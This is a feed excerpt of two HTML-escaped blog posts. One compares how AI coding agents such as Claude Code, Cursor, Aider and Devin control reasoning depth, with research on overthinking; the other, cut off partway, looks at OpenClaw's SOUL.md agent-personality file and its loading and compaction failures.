  
  
  Claude Code — from keyword hacks to adaptive thinking
&lt;/h3&gt;

&lt;p&gt;Claude Code has gone through three distinct eras of thinking control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Era 1: keyword interception.&lt;/strong&gt; Claude Code detected keywords in user prompts and mapped them to &lt;code&gt;budget_tokens&lt;/code&gt; values. "think" mapped to 4,000 tokens. "megathink" mapped to 10,000. "ultrathink" mapped to 32,000 (the maximum). The model never saw these keywords — they were intercepted by Claude Code's preprocessing layer. It was a hack, and &lt;a href="https://decodeclaude.com/ultrathink-deprecated/" rel="noopener noreferrer"&gt;Anthropic deprecated it&lt;/a&gt; in January 2026.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Era 2: always-on extended thinking.&lt;/strong&gt; After deprecation, extended thinking was enabled by default with maximum budget on every request. This worked but was wasteful — simple questions like "what does this function do?" triggered 32K tokens of thinking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Era 3: adaptive thinking (current).&lt;/strong&gt; The current system uses two &lt;a href="https://platform.claude.com/docs/en/build-with-claude/adaptive-thinking" rel="noopener noreferrer"&gt;API parameters&lt;/a&gt; together:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;thinking.type: "adaptive"&lt;/code&gt; — Claude dynamically decides &lt;em&gt;whether&lt;/em&gt; and &lt;em&gt;how much&lt;/em&gt; to think based on request complexity&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;output_config.effort&lt;/code&gt; — a soft guidance signal with levels: &lt;code&gt;low&lt;/code&gt;, &lt;code&gt;medium&lt;/code&gt;, &lt;code&gt;high&lt;/code&gt; (default), &lt;code&gt;max&lt;/code&gt; (Opus only)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;code&gt;/effort&lt;/code&gt; command in the CLI lets users switch between low, medium, and high. At high effort, Claude almost always thinks. At lower levels, it may skip thinking entirely for simple problems. Crucially, effort is &lt;a href="https://platform.claude.com/docs/en/build-with-claude/effort" rel="noopener noreferrer"&gt;"a behavioral signal, not a strict token budget"&lt;/a&gt; — the model can still think more or less than the level suggests.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: API-parameter-controlled.&lt;/strong&gt; Claude Code actively manages reasoning depth via API parameters, with the model making the final adaptive decision.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cursor — the user is the router
&lt;/h3&gt;

&lt;p&gt;Cursor does not control thinking depth. At all.&lt;/p&gt;

&lt;p&gt;Users pick which model to use from a &lt;a href="https://docs.cursor.com/guides/selecting-models" rel="noopener noreferrer"&gt;dropdown&lt;/a&gt; — GPT-4o, Claude Sonnet, Claude Opus, o3, Gemini. If you want deeper thinking, you select a thinking model. If you want speed, you select a fast model. Cursor's "&lt;a href="https://forum.cursor.com/t/cursor-4-7-auto-model-selection/70488" rel="noopener noreferrer"&gt;Auto mode&lt;/a&gt;" picks a reliable model from the available pool, but the official documentation states it "does not route based on task type."&lt;/p&gt;

&lt;p&gt;No &lt;code&gt;reasoning_effort&lt;/code&gt; parameter. No &lt;code&gt;budget_tokens&lt;/code&gt;. No dynamic model routing based on task complexity. The user decides.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: let it go.&lt;/strong&gt; Cursor outsources the thinking control decision entirely to the user.&lt;/p&gt;

&lt;h3&gt;
  
  
  OpenClaw — seven thinking levels and a router
&lt;/h3&gt;

&lt;p&gt;OpenClaw has the most &lt;a href="https://docs.openclaw.ai/tools/thinking" rel="noopener noreferrer"&gt;sophisticated thinking control&lt;/a&gt; of any framework examined.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seven levels&lt;/strong&gt;: &lt;code&gt;off&lt;/code&gt;, &lt;code&gt;minimal&lt;/code&gt;, &lt;code&gt;low&lt;/code&gt;, &lt;code&gt;medium&lt;/code&gt;, &lt;code&gt;high&lt;/code&gt;, &lt;code&gt;xhigh&lt;/code&gt;, &lt;code&gt;adaptive&lt;/code&gt;. Each has natural-language aliases — "think" maps to &lt;code&gt;minimal&lt;/code&gt;, "ultrathink" to &lt;code&gt;high&lt;/code&gt;. The framework translates these into provider-specific parameters: Anthropic's &lt;code&gt;budget_tokens&lt;/code&gt;, OpenAI's &lt;code&gt;reasoning_effort&lt;/code&gt;, or binary on/off for providers like Z.AI and Moonshot that only support a toggle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resolution hierarchy&lt;/strong&gt; (highest priority first):&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Inline directive in current message (&lt;code&gt;/t &amp;lt;level&amp;gt;&lt;/code&gt;, &lt;code&gt;/think:&amp;lt;level&amp;gt;&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Session override&lt;/li&gt;
&lt;li&gt;Per-agent configuration&lt;/li&gt;
&lt;li&gt;Per-model default&lt;/li&gt;
&lt;li&gt;Global default&lt;/li&gt;
&lt;li&gt;Fallback: &lt;code&gt;adaptive&lt;/code&gt; for Claude, &lt;code&gt;low&lt;/code&gt; for other reasoning models, &lt;code&gt;off&lt;/code&gt; otherwise&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Dynamic model routing&lt;/strong&gt;: Separately from thinking levels, OpenClaw supports &lt;a href="https://github.com/BlockRunAI/ClawRouter" rel="noopener noreferrer"&gt;ClawRouter&lt;/a&gt; — a 15-dimension weighted scorer that analyzes token count, code presence, reasoning markers, technical terms, and multi-step patterns to route requests to LIGHT (Haiku), MEDIUM (Sonnet), or HEAVY (Opus) tiers. It runs locally with under 1ms latency. A key design choice: it scores only user messages, not the system prompt, to avoid the large system prompt inflating every request to the most expensive tier.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: API-parameter-controlled + dynamic routing.&lt;/strong&gt; OpenClaw both controls reasoning depth per-request and routes requests to models of different capability.&lt;/p&gt;

&lt;h3&gt;
  
  
  GitHub Copilot — reasoning controls are coming
&lt;/h3&gt;

&lt;p&gt;Copilot's approach is still evolving. Users can &lt;a href="https://github.blog/ai-and-ml/github-copilot/under-the-hood-exploring-the-ai-models-powering-github-copilot/" rel="noopener noreferrer"&gt;switch models mid-session&lt;/a&gt; with &lt;code&gt;/model&lt;/code&gt;, choosing from Claude Opus, Sonnet, GPT-5.3-Codex, GPT-5 mini, GPT-4.1, and Gemini 3 Pro. The &lt;a href="https://github.blog/changelog/2026-02-25-github-copilot-cli-is-now-generally-available/" rel="noopener noreferrer"&gt;Copilot CLI changelog&lt;/a&gt; mentions "configure reasoning effort for extended thinking models," but this appears backend-only — not yet exposed as a user-facing control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: let it go (transitioning to API-parameter-controlled).&lt;/strong&gt; Today, the user picks the model. Tomorrow, Copilot may expose reasoning effort controls.&lt;/p&gt;

&lt;h3&gt;
  
  
  Windsurf — model variants as reasoning levels
&lt;/h3&gt;

&lt;p&gt;Windsurf takes a distinctive approach. Instead of exposing API parameters, it &lt;a href="https://docs.windsurf.com/windsurf/models" rel="noopener noreferrer"&gt;pre-configures model variants&lt;/a&gt; in the model selector: "GPT-5.4 (Low Reasoning)", "GPT-5.4 (Medium Reasoning)", "GPT-5.4 (High Reasoning)", "GPT-5.4 (Extra High Reasoning)". Similarly, "Claude Opus 4.6 (Thinking)" appears as a separate entry from standard Claude Opus.&lt;/p&gt;

&lt;p&gt;Windsurf's custom &lt;a href="https://windsurf.com/blog/windsurf-wave-9-swe-1" rel="noopener noreferrer"&gt;SWE-1 model family&lt;/a&gt; takes this further with "variable thinking" — the model dynamically adjusts reasoning depth based on task complexity. Quick responses for simple tasks, deeper analysis for complex ones. This is native to the model, not framework-level control.&lt;/p&gt;

&lt;p&gt;Different variants consume different amounts of prompt credits, making the cost-quality tradeoff visible to users.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: API-parameter-controlled (via variant selection).&lt;/strong&gt; Windsurf bakes reasoning levels into selectable model configurations rather than exposing raw API parameters.&lt;/p&gt;

&lt;h3&gt;
  
  
  Aider — the most explicit controls
&lt;/h3&gt;

&lt;p&gt;Aider gives users &lt;a href="https://aider.chat/docs/config/reasoning.html" rel="noopener noreferrer"&gt;direct access to reasoning parameters&lt;/a&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;--reasoning-effort low|medium|high&lt;/code&gt; for OpenAI's &lt;code&gt;reasoning_effort&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--thinking-tokens 1k|8k|32k&lt;/code&gt; for Anthropic's &lt;code&gt;budget_tokens&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;In-chat commands: &lt;code&gt;/thinking-tokens 4k&lt;/code&gt;, &lt;code&gt;/reasoning-effort low&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Aider uses model metadata (&lt;code&gt;accepts_settings&lt;/code&gt;) to determine which parameters each model supports and warns you if you try to set an unsupported parameter.&lt;/p&gt;

&lt;p&gt;But Aider's most significant contribution to thinking control is architectural. The &lt;a href="https://aider.chat/2024/09/26/architect.html" rel="noopener noreferrer"&gt;Architect/Editor pattern&lt;/a&gt; separates reasoning from editing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An &lt;strong&gt;Architect&lt;/strong&gt; model (often a reasoning model like o1 or R1) describes &lt;em&gt;how&lt;/em&gt; to solve the problem&lt;/li&gt;
&lt;li&gt;An &lt;strong&gt;Editor&lt;/strong&gt; model (often GPT-4o or Sonnet) translates that plan into precise file edits&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This produced &lt;a href="https://aider.chat/2025/01/24/r1-sonnet.html" rel="noopener noreferrer"&gt;state-of-the-art results&lt;/a&gt;: DeepSeek R1 as architect + Sonnet as editor achieved 64.0% on the aider polyglot benchmark at 14x less cost than the previous o1 SOTA. The insight: instead of making one model think harder, use two models — one for reasoning, one for execution. This mirrors the &lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;plan-vs-task separation&lt;/a&gt; we explored in agent design — plans are for reasoning, tasks are for execution.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: API-parameter-controlled + architectural.&lt;/strong&gt; Aider both exposes raw API parameters and introduces a model-pair architecture that implicitly controls where reasoning happens.&lt;/p&gt;

&lt;h3&gt;
  
  
  Devin — the black box
&lt;/h3&gt;

&lt;p&gt;Devin doesn't expose thinking controls because Devin isn't a wrapper around a single model. It's a &lt;a href="https://cognition.ai/blog/devin-annual-performance-review-2025" rel="noopener noreferrer"&gt;compound AI system&lt;/a&gt; — "a diverse set of model inferences to plan, act, evaluate, and use tools." Users set a spend limit per ticket (e.g., $5.00), and Devin allocates reasoning resources internally.&lt;/p&gt;

&lt;p&gt;Cognition's blog describes Devin building &lt;a href="https://cognition.ai/blog/devin-2" rel="noopener noreferrer"&gt;explicit mechanisms to model user intent&lt;/a&gt; "across hundreds of millions of agent decisions." The internal architecture is proprietary. From the outside, it's a black box that thinks as hard as it thinks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: let it go (proprietary compound system).&lt;/strong&gt; Devin controls thinking internally but gives users no knobs to turn.&lt;/p&gt;

&lt;h2&gt;
  
  
  The landscape at a glance
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Framework&lt;/th&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Thinking levels&lt;/th&gt;
&lt;th&gt;Dynamic routing&lt;/th&gt;
&lt;th&gt;User control&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Claude Code&lt;/td&gt;
&lt;td&gt;API parameters&lt;/td&gt;
&lt;td&gt;4 (low/med/high/max)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;/effort&lt;/code&gt; command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cursor&lt;/td&gt;
&lt;td&gt;Let it go&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;No (heuristic Auto)&lt;/td&gt;
&lt;td&gt;Model dropdown&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenClaw&lt;/td&gt;
&lt;td&gt;API params + routing&lt;/td&gt;
&lt;td&gt;7 levels + aliases&lt;/td&gt;
&lt;td&gt;Yes (ClawRouter)&lt;/td&gt;
&lt;td&gt;Inline &lt;code&gt;/t&lt;/code&gt;, per-agent config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Copilot&lt;/td&gt;
&lt;td&gt;Let it go (transitioning)&lt;/td&gt;
&lt;td&gt;Emerging&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Model selector&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windsurf&lt;/td&gt;
&lt;td&gt;Pre-configured variants&lt;/td&gt;
&lt;td&gt;4 per model&lt;/td&gt;
&lt;td&gt;Partial (SWE-1)&lt;/td&gt;
&lt;td&gt;Variant selector&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aider&lt;/td&gt;
&lt;td&gt;API params + architecture&lt;/td&gt;
&lt;td&gt;Direct param access&lt;/td&gt;
&lt;td&gt;Architect/Editor&lt;/td&gt;
&lt;td&gt;CLI flags + in-chat commands&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Devin&lt;/td&gt;
&lt;td&gt;Black box&lt;/td&gt;
&lt;td&gt;Internal&lt;/td&gt;
&lt;td&gt;Internal&lt;/td&gt;
&lt;td&gt;Spend limit only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What the research says
&lt;/h2&gt;

&lt;p&gt;The academic consensus is clear on one thing: &lt;strong&gt;more thinking tokens is not always better.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2505.17813" rel="noopener noreferrer"&gt;Don't Overthink It&lt;/a&gt; (Hassid et al., 2025) found that shorter reasoning chains are up to &lt;strong&gt;34.5% more accurate&lt;/strong&gt; than the longest chain sampled for the same question. Their &lt;code&gt;short-m@k&lt;/code&gt; method achieves similar or superior accuracy while using &lt;strong&gt;40% fewer thinking tokens&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2512.19585" rel="noopener noreferrer"&gt;Increasing the Thinking Budget is Not All You Need&lt;/a&gt; demonstrated that alternative strategies — self-consistency, self-reflection — outperform simply raising the thinking budget. More tokens doesn't mean better reasoning.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2602.13517" rel="noopener noreferrer"&gt;Think Deep, Not Just Long&lt;/a&gt; introduced the "deep-thinking ratio" metric, showing that raw token counts are unreliable proxies for reasoning quality. Increased generation length doesn't consistently correlate with accuracy and may signal "overthinking" that degrades performance.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The most promising direction is &lt;strong&gt;self-budgeting&lt;/strong&gt;: having the model estimate its own needed compute. &lt;a href="https://arxiv.org/abs/2412.18547" rel="noopener noreferrer"&gt;TALE&lt;/a&gt; (ACL 2025) reduces output token costs by &lt;strong&gt;67%&lt;/strong&gt; while maintaining competitive accuracy by letting the model allocate its own reasoning budget.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://nousresearch.com/measuring-thinking-efficiency-in-reasoning-models-the-missing-benchmark/" rel="noopener noreferrer"&gt;Nous Research&lt;/a&gt; found that open-weight reasoning models use &lt;strong&gt;1.5-4x more tokens&lt;/strong&gt; than closed models on identical tasks — up to &lt;strong&gt;10x&lt;/strong&gt; for simple knowledge questions. The per-token cost advantage of open models is often negated by their token inefficiency. For local-first runtimes, this efficiency gap matters even more — every wasted thinking token is wasted compute on your own hardware. (We explored this cost dynamic in &lt;a href="https://openwalrus.xyz/blog/why-we-built-openwalrus" rel="noopener noreferrer"&gt;why we built OpenWalrus&lt;/a&gt;.)&lt;/p&gt;

&lt;p&gt;A comprehensive &lt;a href="https://arxiv.org/abs/2507.02076" rel="noopener noreferrer"&gt;survey of adaptive test-time compute&lt;/a&gt; (Alomrani et al., 2025) frames the problem cleanly: current models are inefficient because they "often overthink simple problems while underthinking hard ones." The field is moving from fixed budgets to adaptive allocation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;The landscape reveals several tensions without clear resolutions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should the framework or the model decide?&lt;/strong&gt; Anthropic's adaptive thinking lets Claude decide when to think. OpenClaw's ClawRouter decides which model to use. Aider's architect/editor pattern decides where reasoning happens. Each delegates the decision to a different layer. Which one is closest to the signal — the framework that sees the user's full history, the model that understands the problem, or a lightweight router that can classify in under 1ms?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is the Architect/Editor pattern the real answer?&lt;/strong&gt; Aider's approach sidesteps the "how hard should this model think" question entirely. Instead of making one model think harder, it uses a reasoning model for planning and a fast model for editing — achieving SOTA results at &lt;a href="https://aider.chat/2025/01/24/r1-sonnet.html" rel="noopener noreferrer"&gt;14x less cost&lt;/a&gt;. Does this generalize beyond coding, or is it specific to tasks with a clean plan-then-execute structure?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Do users actually want thinking controls?&lt;/strong&gt; Cursor's "let it go" approach is the simplest and arguably the most popular. Most developers just want the right answer — they don't want to tune &lt;code&gt;reasoning_effort&lt;/code&gt; or pick thinking levels. Is explicit control a power-user feature that becomes noise for everyone else? Or does the 34.5% accuracy gap between short and long chains mean that &lt;a href="https://arxiv.org/abs/2505.17813" rel="noopener noreferrer"&gt;leaving it to chance&lt;/a&gt; is leaving quality on the table?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can dynamic routing work at the framework level?&lt;/strong&gt; OpenClaw's ClawRouter scores requests on 15 dimensions with under 1ms latency. But it only sees the user's message, not the full context. A request that looks simple ("fix this") may require deep reasoning once the agent reads the codebase. Is pre-request routing fundamentally limited, or can it be made context-aware without adding latency?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What happens when thinking costs approach zero?&lt;/strong&gt; If inference costs drop 10x in the next two years (as they have in the past two), does the entire thinking-control problem dissolve? Or does the &lt;a href="https://arxiv.org/abs/2602.13517" rel="noopener noreferrer"&gt;overthinking problem&lt;/a&gt; — where more thinking actively degrades accuracy — mean that budget control stays important regardless of cost?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is "adaptive" just a better word for "uncontrolled"?&lt;/strong&gt; Anthropic's adaptive thinking and Windsurf's variable thinking both let the model decide how much to reason. This works when the model's judgment about task complexity is good. When it's wrong — overthinking a simple question or underthinking a subtle bug — there's no user-visible feedback loop. Are we trading explicit control for implicit trust?&lt;/p&gt;

&lt;p&gt;The frameworks that control thinking today are betting that reasoning is a resource worth managing. The frameworks that don't are betting that models will learn to manage it themselves. The &lt;a href="https://openwalrus.xyz/blog/agent-prompt-systems" rel="noopener noreferrer"&gt;research&lt;/a&gt; suggests both bets have merit — and neither has won yet.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://platform.claude.com/docs/en/build-with-claude/adaptive-thinking" rel="noopener noreferrer"&gt;Anthropic: Adaptive Thinking&lt;/a&gt; — how Claude decides when and how much to think&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://platform.claude.com/docs/en/build-with-claude/effort" rel="noopener noreferrer"&gt;Anthropic: Effort Parameter&lt;/a&gt; — soft guidance for reasoning depth&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://aider.chat/2024/09/26/architect.html" rel="noopener noreferrer"&gt;Aider: Architect/Editor Pattern&lt;/a&gt; — separating reasoning from editing&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2505.17813" rel="noopener noreferrer"&gt;Don't Overthink It&lt;/a&gt; — shorter chains are up to 34.5% more accurate&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2507.02076" rel="noopener noreferrer"&gt;Reasoning on a Budget&lt;/a&gt; — comprehensive survey of adaptive test-time compute&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2412.18547" rel="noopener noreferrer"&gt;TALE: Token-Budget-Aware Reasoning&lt;/a&gt; — 67% token cost reduction via self-budgeting&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nousresearch.com/measuring-thinking-efficiency-in-reasoning-models-the-missing-benchmark/" rel="noopener noreferrer"&gt;Nous Research: Thinking Efficiency&lt;/a&gt; — open vs closed model token efficiency&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/BlockRunAI/ClawRouter" rel="noopener noreferrer"&gt;ClawRouter&lt;/a&gt; — OpenClaw's 15-dimension request scorer&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/thinking-control" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>SOUL.md: brilliant idea, brittle implementation</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:54:03 +0000</pubDate>
      <link>https://forem.com/crabtalk/soulmd-brilliant-idea-brittle-implementation-2941</link>
      <guid>https://forem.com/crabtalk/soulmd-brilliant-idea-brittle-implementation-2941</guid>
      <description>&lt;p&gt;OpenClaw's SOUL.md gave agents a personality by writing identity into a markdown file. With 180K+ GitHub stars and a thriving template ecosystem — from &lt;a href="https://github.com/thedaviddias/souls-directory" rel="noopener noreferrer"&gt;curated directories&lt;/a&gt; to &lt;a href="https://www.crewclaw.com/blog/soul-md-create-ai-agent" rel="noopener noreferrer"&gt;generator tools&lt;/a&gt; — the idea clearly resonates. But the implementation has cracks: silent loading failures, context window competition, compaction amnesia, and a growing attack surface.&lt;/p&gt;

&lt;p&gt;We dug into how SOUL.md works, where it breaks, and what it means for agent identity design.&lt;/p&gt;

&lt;h2&gt;
  
  
  What SOUL.md is
&lt;/h2&gt;

&lt;p&gt;Peter Steinberger created SOUL.md because he wanted his agent to sound like a friend, not a customer service bot. In an interview on the &lt;a href="https://lexfridman.com/peter-steinberger-transcript" rel="noopener noreferrer"&gt;Lex Fridman Podcast (#491)&lt;/a&gt;, he described instructing his agent to "write your own agents.md, give yourself a name" — letting the agent partially self-define its character.&lt;/p&gt;

&lt;p&gt;The result is a markdown file with three sections:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Core Truths&lt;/strong&gt; — fundamental beliefs and principles ("be genuinely helpful," "have opinions," "allowed to disagree")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Boundaries&lt;/strong&gt; — hard limits on behavior ("be careful with external actions like emails; be bold with internal actions like reading/organizing")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The Vibe&lt;/strong&gt; — voice, tone, quirks ("like a senior engineer who has seen it all; direct, slightly weary, but supportive")&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;SOUL.md is part of a broader file ecosystem: STYLE.md for voice patterns, SKILL.md for capabilities, MEMORY.md for session continuity, plus data/ and examples/ directories for calibration material.&lt;/p&gt;

&lt;p&gt;Technically, OpenClaw loads SOUL.md as a bootstrap file into the system prompt at session start. Per-file limit: 20,000 characters. Total bootstrap budget: 150,000 characters. The injection happens before any user messages, giving SOUL.md favorable positioning in the model's attention — but at a permanent cost to available context.&lt;/p&gt;

&lt;h2&gt;
  
  
  The adoption signal
&lt;/h2&gt;

&lt;p&gt;The ecosystem is real:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/aaronjmars/soul.md" rel="noopener noreferrer"&gt;aaronjmars/soul.md&lt;/a&gt; (189 stars) provides templates and structure guides&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/thedaviddias/souls-directory" rel="noopener noreferrer"&gt;souls-directory&lt;/a&gt; (68 stars) curates personality templates&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.crewclaw.com/blog/soul-md-create-ai-agent" rel="noopener noreferrer"&gt;CrewClaw&lt;/a&gt; generates SOUL.md for any role with pre-built templates&lt;/li&gt;
&lt;li&gt;Multiple DEV Community guides walk developers through configuration&lt;/li&gt;
&lt;li&gt;A viral Reddit thread produced configurations ranging from "lengthy legal contract-style" to "Gen Z-style roleplay scripts"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This isn't a niche feature. OpenClaw has 180,000+ GitHub stars, making SOUL.md a de facto standard for its user base.&lt;/p&gt;

&lt;h2&gt;
  
  
  What SOUL.md gets right
&lt;/h2&gt;

&lt;p&gt;The design has genuine strengths:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Plain markdown.&lt;/strong&gt; No special syntax, no YAML schema, no build step. Anyone who can write a README can write a SOUL.md. It's git-diffable, editor-friendly, and works with any LLM that processes text.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Addresses a real gap.&lt;/strong&gt; Agents without identity constraints are generic — they sound like documentation, not collaborators. Developers who customize SOUL.md consistently report that it transforms their agent from "chatbot" to "partner."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Specificity over generality.&lt;/strong&gt; The &lt;a href="https://github.com/aaronjmars/soul.md" rel="noopener noreferrer"&gt;soul.md project&lt;/a&gt; emphasizes contradictions over coherence and real opinions over safe positions — "because that's what makes you identifiably you." This mirrors how actual personalities work: humans aren't consistent, and forcing consistency makes agents feel synthetic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Community-driven iteration.&lt;/strong&gt; The template ecosystem lets developers learn from each other's configurations. The &lt;a href="https://dev.to/techfind777/i-tested-100-soulmd-configurations-heres-what-actually-works-hoi"&gt;DEV Community study&lt;/a&gt; that tested 100 configurations found concrete patterns: specificity outperforms abstract rules by 23% on consistency.&lt;/p&gt;

&lt;h2&gt;
  
  
  Five ways SOUL.md breaks
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Silent loading failures
&lt;/h3&gt;

&lt;p&gt;SOUL.md fails silently in at least five documented ways. Per the &lt;a href="https://vpn07.com/en/blog/2026-openclaw-soul-md-fix-personality-file-not-loading.html" rel="noopener noreferrer"&gt;OpenClaw troubleshooting guide&lt;/a&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Files placed in &lt;code&gt;agentDir&lt;/code&gt; instead of &lt;code&gt;workspace&lt;/code&gt; are ignored&lt;/li&gt;
&lt;li&gt;The Ollama provider using &lt;code&gt;openai-completions&lt;/code&gt; format skips bootstrap files entirely&lt;/li&gt;
&lt;li&gt;Non-UTF-8 encoding causes silent skipping&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;USER.md&lt;/code&gt; leaks to non-owner senders&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When SOUL.md fails to load, there's no error, no warning, no indication. The agent just acts like its default self. Developers debug for hours before discovering the file was never read.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Subagent sessions don't load it
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://github.com/openclaw/openclaw/issues/24852" rel="noopener noreferrer"&gt;GitHub Issue #24852&lt;/a&gt;: subagent sessions spawned via &lt;code&gt;sessions_spawn&lt;/code&gt; only load AGENTS.md and TOOLS.md. SOUL.md was excluded by a &lt;code&gt;MINIMAL_BOOTSTRAP_ALLOWLIST&lt;/code&gt; in compiled JavaScript. Specialized agents couldn't fulfill their roles because they lacked identity definitions. Fixed in &lt;a href="https://github.com/openclaw/openclaw/pull/24979" rel="noopener noreferrer"&gt;PR #24979&lt;/a&gt;, but the bug was live for months.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Compaction amnesia
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://github.com/openclaw/openclaw/issues/17727" rel="noopener noreferrer"&gt;GitHub Issue #17727&lt;/a&gt;: after automatic session compaction (which summarizes conversation history to save context), agents lose awareness of SOUL.md. The compacted summary references rules abstractly, but the agent no longer has the full rule text. This causes behavioral regression — agents skip verification steps and ignore operational constraints they were following minutes earlier.&lt;/p&gt;

&lt;p&gt;This is the deepest problem with static identity files. Identity isn't just about knowing &lt;em&gt;what&lt;/em&gt; the rules are — it's about the model having the actual text in its attention window. Compaction destroys that. (We explored this tension in &lt;a href="https://openwalrus.xyz/blog/agent-prompt-systems" rel="noopener noreferrer"&gt;how instruction files decay from MVP to production&lt;/a&gt;.)&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Context window competition
&lt;/h3&gt;

&lt;p&gt;A 1,500-word SOUL.md consumes roughly 2,000 tokens — tokens that could go to reasoning, tool results, or conversation history. The tradeoff is measurable:&lt;/p&gt;

&lt;p&gt;An &lt;a href="https://www.marktechpost.com/2026/02/25/new-eth-zurich-study-proves-your-ai-coding-agents-are-failing-because-your-agents-md-files-are-too-detailed/" rel="noopener noreferrer"&gt;ETH Zurich study&lt;/a&gt; on AGENTS.md (which generalizes to any static instruction file) found that human-written context files improve task completion by only &lt;strong&gt;+4%&lt;/strong&gt; on average. LLM-generated files &lt;em&gt;reduced&lt;/em&gt; performance by ~3% and increased costs by 14-22%.&lt;/p&gt;

